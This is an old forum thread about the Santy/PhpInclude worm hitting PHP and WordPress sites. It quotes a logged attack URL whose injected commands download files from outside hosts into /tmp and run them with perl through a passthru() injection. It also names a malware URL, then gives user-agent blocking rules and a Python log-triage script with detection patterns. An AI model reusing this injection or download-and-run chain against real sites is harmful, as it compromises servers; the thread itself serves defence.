Wordpress Blog Vulnerable To Attacks?

wordpress

#1

I think that the Wordpress Search Hilite 1.2 Plugin
might be susceptible to an attack because of its
"include()" and "require()" functions.

Googling around I found out that LWP::Simple/5.76 is a malicious Perl Script aka Santy.E.Worm aka the PhpInlude.Worm.

I just happened to be skimming through my log file and found a very suspicious entry that caught my attention. Curious to find out more, I followed one of the URLs in the log.

http://weblicious.com/.notes/ssh2.htm

DO NOT VISIT THIS LINK!
As soon as you enter it, it automatically infects your system with the Exploit-phpBB!hilight trojan.

Though it's safe to say that this trojan will not do anything malicious to your PC.

Find out more about the "Exploit-phpBB!hilight" trojan here by mcafee.com

Funny I just wrote above about the Wordpress Search Hilite 1.2 Plugin.

Here are some details about this malicious bot.

DATE           IP ADDRESS        USER AGENT
01/01 12:35    217.160.130.70    LWP::Simple/5.76

Here's what caught my eye:

http://www.thekodclan.com/blog&rush=echo START; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo END&highlight=’.passthru($HTTP_GET_VARS[rush]).’’;

Note that it is apparently trying to execute a series of commands:
cd /tmp
wget

MORE INFO

Santy.C and Santy.E behave so differently from Santy.A that it has been renamed to the PhpInclude.Worm. The worm doesn’t exploit the vulnerabilities in phpBB targeted by its predecessor, instead aiming for a wider range of common programming errors in PHP Web pages. It uses search engines including Google, Yahoo and AOL to identify exploitable Web pages written in PHP that use the functions “include()” and “require()” in an insecure manner.

Vulnerable sites include those that will include just about anything with the include() command. Make sure only to include files sitting in a designated directory, or to always add an extension or a path to any include command issued on your site, and you should be on the safe side. And, of course, if you don't want the worm to eat up your bandwidth, include something like the code below in your pages.

TO STOP THE WORM USING PHP
Simply add this at the top of the index.php page:

// Block the worm's user agents (LWP::Simple / lwp-trivial, any version); preg_match replaces the deprecated eregi().
if (preg_match('/LWP::Simple|lwp-trivial/i', (string) getenv("HTTP_USER_AGENT"))) {
    exit;
}

Which means that if the user agent (browser) visiting identifies itself as LWP::Simple or lwp-trivial, which this worm does, with a version number attached as well, it will simply not get anything at all from your site.

TO STOP THE WORM USING Non-PHP SITES

Simply save this into a text file using Notepad, upload it to the root directory and change the file extension from *.txt to .htaccess:

SetEnvIfNoCase User-Agent "LWP::Simple/5.36" bad_bot
SetEnvIfNoCase User-Agent "LWP::Simple/5.43" bad_bot
SetEnvIfNoCase User-Agent "LWP::Simple/5.47" bad_bot
SetEnvIfNoCase User-Agent "LWP::Simple/5.48" bad_bot
SetEnvIfNoCase User-Agent "LWP::Simple/5.50" bad_bot
SetEnvIfNoCase User-Agent "LWP::Simple/5.53" bad_bot
SetEnvIfNoCase User-Agent "LWP::Simple/5.63" bad_bot
SetEnvIfNoCase User-Agent "LWP::Simple/5.64" bad_bot
SetEnvIfNoCase User-Agent "LWP::Simple/5.65" bad_bot
SetEnvIfNoCase User-Agent "LWP::Simple/5.66" bad_bot
SetEnvIfNoCase User-Agent "LWP::Simple/5.69" bad_bot
SetEnvIfNoCase User-Agent "LWP::Simple/5.70" bad_bot
SetEnvIfNoCase User-Agent "LWP::Simple/5.75" bad_bot
SetEnvIfNoCase User-Agent "LWP::Simple/5.76" bad_bot
SetEnvIfNoCase User-Agent "LWP::Simple/5.79" bad_bot
SetEnvIfNoCase User-Agent "LWP::Simple/5.800" bad_bot
SetEnvIfNoCase User-Agent "LWP::Simple/5.801" bad_bot
SetEnvIfNoCase User-Agent "LWP::Simple/5.802" bad_bot
SetEnvIfNoCase User-Agent "LWP::Simple/5.803" bad_bot
SetEnvIfNoCase User-Agent "lwp-trivial/1.32" bad_bot
SetEnvIfNoCase User-Agent "lwp-trivial/1.34" bad_bot
SetEnvIfNoCase User-Agent "lwp-trivial/1.35" bad_bot
SetEnvIfNoCase User-Agent "lwp-trivial/1.36" bad_bot
SetEnvIfNoCase User-Agent "lwp-trivial/1.38" bad_bot
SetEnvIfNoCase User-Agent "lwp-trivial/1.40" bad_bot
SetEnvIfNoCase User-Agent "lwp-trivial/1.41" bad_bot

Order Allow,Deny
Allow from all
Deny from env=bad_bot

SOME LINKS

http://wordpress.org/support/7/19285 - WORDPRESS.org

The Knights Of Death® :: An XBOX LIVE™ GAMING CLAN
http://www.thekodclan.com/
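As an added example that is not part of the original post: a small log-triage script that applies the two signals the post describes (the LWP::Simple / lwp-trivial user agent, and PHP code smuggled into a query parameter) to Apache combined-format access-log lines. The log lines are constructed for the example, and the IP addresses are documentation-range placeholders, not the ones from the post.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2005:12:35:00 +0000] "GET /blog/?highlight=%27.passthru($HTTP_GET_VARS[rush]).%27&rush=echo%20START HTTP/1.1" 200 512 "-" "LWP::Simple/5.76"
203.0.113.9 - - [01/Jan/2005:12:36:10 +0000] "GET /blog/index.php?s=wordpress HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (X11; Linux)"
203.0.113.7 - - [01/Jan/2005:12:37:22 +0000] "GET /blog/ HTTP/1.1" 200 8192 "-" "lwp-trivial/1.41"
"""

# Combined log format: ip ident user [timestamp] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Signal 1: the worm's user agents, any version (same test as the PHP/.htaccess rules in the post).
BAD_UA = re.compile(r'LWP::Simple|lwp-trivial', re.I)

# Signal 2: PHP code in a query parameter. The payload only works if a page evaluates or
# includes the parameter value, so a shell-execution call or a superglobal in a query is a red flag.
INJECT = re.compile(r"passthru\s*\(|system\s*\(|shell_exec\s*\(|\$HTTP_GET_VARS|\$_GET", re.I)


def triage(log_text):
    """Return one finding per suspicious line: ip, user agent and the reasons it was flagged."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        reasons = []
        if BAD_UA.search(m['ua']):
            reasons.append('worm user-agent')
        # URL-decode the query string so %27 / %20 cannot hide the payload from the pattern.
        query = unquote(m['path'].partition('?')[2])
        if INJECT.search(query):
            reasons.append('php code in query string')
        if reasons:
            findings.append({'ip': m['ip'], 'ua': m['ua'], 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for f in triage(SAMPLE_LOG):
        print(f['ip'], f['ua'], ', '.join(f['reasons']))
```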


#2

Currently, every PHP app is vulnerable to this. You can further protect yourself by running the latest version of WordPress, v1.2.2, and keeping regular backups.
http://wordpress.org/development/2004/12/one-point-two-two/
http://www.tamba2.org.uk/wordpress/backup/


MacManX.com


#3

Good suggestion. Keeping backups is definitely the way to go. Backing up your databases, blog comments and entries, forums, or site period!

You can't protect yourself from every attack, so in case of emergencies you're ready to rock and roll your data back to your site.

MacManX, your site “Blog” is the $#|t, I like how you change the default Wordpress template.

I'm in the process of making a template for my blog, and um maybe in the future you can give me some pointers on certain PHP stuff.

http://www.thekodclan.com/blog

:wink:
*"The worm doesn’t exploit the vulnerabilities in phpBB targeted by its predecessor, instead aiming for a wider range of common programming errors in PHP Web pages. It uses search engines including Google, Yahoo and AOL to identify exploitable Web pages written in PHP that use the functions “include()” and “require()” in an insecure manner.

Vulnerable sites include those that will include just about anything with the include() command "*

The Knights Of Death® :: An XBOX LIVE™ GAMING CLAN
http://www.thekodclan.com/


#4

Thanks for the compliment. My theme is actually based off of Michael Heilemann’s Kubrick, with a few changes to the PHP and the overall look (via Photoshop).

If you’re interested, here’s a complete list of themes for WordPress.


MacManX.com